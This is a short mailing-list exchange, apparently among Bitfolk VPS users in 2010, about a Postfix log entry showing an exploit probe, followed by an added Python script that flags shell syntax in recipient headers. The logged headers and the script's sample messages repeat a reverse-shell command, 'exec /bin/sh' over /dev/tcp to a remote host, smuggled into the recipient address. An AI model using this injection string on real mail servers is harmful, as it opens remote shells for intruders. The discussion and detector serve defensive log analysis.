Hi Alastair,
I received the very same e-mail, only a matter of minutes after yours. My
server is not listed as an MX for any domains, hence it looks like the
exploit attempts were a follow-up to a sweeping port scan. No doubt other
Bitfolk VPSes received the same thing.
Mathew
On Thu, March 18, 2010 7:47 am, Alastair Sherringham wrote:
The httpd are often mod_proxy or PHP/phpMyAdmin attempts (no PHP
here), but an odd record in the Postfix log today was a little
different:
X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"(a)calliope.bitfolk
Received: from bluedick (debian01.vservers.at [194.106.206.7])
by calliope (Postfix) with SMTP id F1B31DC001
for <"root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0">; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
Message-Id: <20100317225313.F1B31DC001@calliope>
Date: Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
From: blue(a)dick.com
To: undisclosed-recipients:;
I assume some sort of attempt to break Postfix. This message was
delivered to "root" mailbox (no content).
Alastair Sherringham
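Added example, not part of either message above: one way to flag this kind of probe when reviewing delivered mail is to check the recipient headers Postfix records (X-Original-To, Delivered-To, and the "for <...>" clause of Received) for shell syntax. The sample messages and their hostnames and addresses are constructed, and the function names are hypothetical.

```python
import re
from email import message_from_string

# Shell syntax that has no place in a recipient address.
SHELL_MARKERS = re.compile(r'[|;`<>]|\$\(|/dev/(?:tcp|udp)/')
# "for <addr>" in a Received header; a quoted local part may contain < and >.
RECEIVED_FOR = re.compile(r'\bfor\s+<("(?:[^"\\]|\\.)*"(?:@[^>\s]*)?|[^>]*)>')
RECIPIENT_HEADERS = ("X-Original-To", "Delivered-To")

def unfold(value):
    """Join a folded (wrapped) header value back into one line."""
    return re.sub(r'\r?\n[ \t]+', ' ', value).strip()

def suspicious_recipients(raw_message):
    """Return sorted (header, address) pairs whose address carries shell syntax."""
    msg = message_from_string(raw_message)
    found = set()
    for name in RECIPIENT_HEADERS:
        for value in msg.get_all(name, []):
            addr = unfold(value)
            if SHELL_MARKERS.search(addr):
                found.add((name, addr))
    for value in msg.get_all("Received", []):
        m = RECEIVED_FOR.search(unfold(value))
        if m and SHELL_MARKERS.search(m.group(1)):
            found.add(("Received", m.group(1)))
    return sorted(found)

# Constructed samples: same shape as the excerpt above, documentation addresses.
ADDR = '"root+:|exec /bin/sh 0</dev/tcp/192.0.2.10/9991 1>&0\n 2>&0"'
PROBE = (
    f'X-Original-To: {ADDR}\n'
    f'Delivered-To: {ADDR}@mx.example\n'
    'Received: from probe (host.example [198.51.100.7])\n'
    '\tby mx (Postfix) with SMTP id 0000000000\n'
    f'\tfor <{ADDR}>; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)\n'
    'To: undisclosed-recipients:;\n\n'
)
BENIGN = (
    'Delivered-To: alice+lists@mx.example\n'
    'Received: from relay (relay.example [198.51.100.9])\n'
    '\tby mx (Postfix) with SMTP id 1111111111\n'
    '\tfor <alice+lists@mx.example>; Wed, 17 Mar 2010 23:00:00 +0000 (GMT)\n\n'
)

if __name__ == "__main__":
    for header, addr in suspicious_recipients(PROBE):
        print(f"{header}: {addr}")
    print("benign hits:", suspicious_recipients(BENIGN))
```

The quoted-local-part branch of RECEIVED_FOR matters here: a plain `<[^>]*>` match would stop at the first `>` inside the address and miss the rest of it.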